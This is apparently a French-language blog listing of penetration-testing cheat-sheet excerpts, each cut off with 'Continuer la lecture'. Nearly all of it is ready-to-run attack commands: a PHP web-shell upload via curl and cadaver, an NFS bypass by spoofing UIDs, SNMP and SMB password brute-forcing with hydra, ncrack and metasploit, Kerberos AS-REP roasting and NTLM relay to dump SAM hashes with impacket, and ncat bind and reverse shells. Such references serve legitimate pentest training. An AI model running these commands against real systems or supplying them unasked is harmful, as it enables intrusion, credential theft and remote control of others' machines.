Backdoor HTTP

# créer aun fichier.php dans le répertoire /test avec curl. curl -X PUT -d '<?php system($_GET["c"]);' http://192.168.56.103/test/1.php # téléverser un backdoor avec curl curl -X POST -F "file=@/file/location/shell.php" http://192.168.2.2/upload.php #téléverser en utilisant un formulaire web curl -F "field=<shell.zip" http://192.168.2.3/upld.php -F 'k=v' –cookie "k=v;" -F "submit=true" -L -v # téléversement avec cadaver cadaver http://192.168.2.22/dav/ put /home/germain/shell.php

Contournement de la sécurité NFS

showmount -e 192.168.2.64 mkdir /mnt/nfs mount -t nfs -o vers=3 192.168.2.64:/nfspath /mnt/nfs ls -ld /mnt/nfs (indique que les propriétaires sont uid=2008 et gid=2008 et la permission d'y accéder est interdite. nfs v4 montre le uid et gid de nobody) groupadd –gid 2008 vulnix_group useradd –uid 2008 –groups vulnix_group vulnix_user sudo -u vulnix_user ls -l /mnt/nfs … Continuer la lecture

SNMP

snmpwalk -c public -v1 192.168.2.209 snmpcheck -t 192.168.2.209 -c public onesixtyone -c names -i hosts nmap -sT -p 161 192.168.2.209 -oG snmp_results.txt snmpenum -t 192.168.2.210 Cracker le mot de passe pour un service SNMP avec hydra hydra -P /usr/share/wordlists/pass.txt 10.10.10.10 snmp Cracker le mot de passe SNMP avec metasploit use auxiliary/scanner/snmp/snmp_login msf auxiliary(scanner/snmp/snmp_login)> set rhosts … Continuer la lecture

Intrusion avec la force brute

Essayer les mots de passe du fichier rockyou.txt pour se connecter au partage ncrack -u username -P rockyou.txt -T 5 192.168.2.2 -p smb -v Se créer un dictionnaire de mots de passe avec le mots-clés d’un site internet cewl -d 2 -m 5 -w mylist.txt https://www.searchevolution.com Se créer un dictionnaire personnalisé pour un usager (mots … Continuer la lecture

ActiveDirectory (AD)

Utiliser SharpHound pour obtenir de l’information et importer dans BloodHound pour analyse. Télécharger PingCastle de pingcastle.com pour générer des rapports Obtenir une liste d’utilisateurs d’active directory smbclient -L \\\\10.10.10.10 ls smbclient -L \\\\10.10.10.10\profile$ ls #permet d'obtenir une liste d'utilisateurs GetNPUsers.py mydomain.local/ -usersfile wordlist -format john -output hashes.txt -dc-ip 10.10.10.10 #kerberos attack from impacket john –wordlist=rockyou.txt … Continuer la lecture

NTLM Relay

Vulnérable si la signature des messages est désactivé # nmap -n -Pn -p 445 –script smb-security-mode 192.168.2.0/24 Désactiver SMB et HTTP dans Responder.conf et démarrer Responder # python2 Responder.py -I eth0 -r -d -w Créer un relai vers le serveur cible avec ntlmrelayx (impacket tools) et extraire le fichier SAM # ./ntlmrelayx.py -smb2support -t smb://192.168.2.64 … Continuer la lecture

Shells

Démarrer un backdoor shell sur l’ordinateur victime # ncat -l -p 1337 -e "/bin/bash -i" Connecter sur le backdoor # ncat 192.168.2.6 1337 Écouter pour un shell inversé (sur l’ordinateur de l’attaquant) # ncat -l -p 23 Démarrer le shell sur la victime et permettre le contrôle sur l’attaquant. shell inversé # ncat -e "/bin/bash … Continuer la lecture

Scan réseau

Déterminer les hôtes d’un sous-réseau # nmap -n -sn -PR 192.168.2.0/24 Déterminer les noms d’hôtes à partir d’adresse IP faisant partie d’un sous-réseau (Requête DNS inversée) # nmap -sL 192.168.2.0/24 #Déterminer les hôtes actifs en utilisant les techniques ARP, ICMP, SYN 443/tcp, ACK 80/tcp) # nmap -sn -n 192.168.2.0/24 TCP scan (SYN scan). Pratique lorsque … Continuer la lecture